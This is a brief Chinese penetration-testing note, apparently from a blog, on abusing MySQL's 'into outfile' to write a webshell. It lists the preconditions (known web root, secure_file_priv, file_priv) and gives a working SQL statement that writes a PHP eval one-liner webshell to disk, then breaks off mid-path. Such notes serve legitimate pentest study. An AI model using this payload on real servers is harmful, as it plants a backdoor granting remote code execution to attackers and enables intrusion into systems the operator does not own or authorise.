渗透测试中MySQL的利用方式
简单记录MySQL的几种利用方式1、通过into outfile写shell条件:(1)已知网站可访问路径的绝对路径(2)数据库变量global secure_file_priv 的值非NULL或包含了网站可访问的绝对路径(3)数据库服务有写文件权限,数据库用户有file_priv权限(4)未对导出的路径的双引号进行转义select '<?php @eval($_POST[rain]);?>' into outfile "C:\\phpStudy\\MySQL\\b
复制链接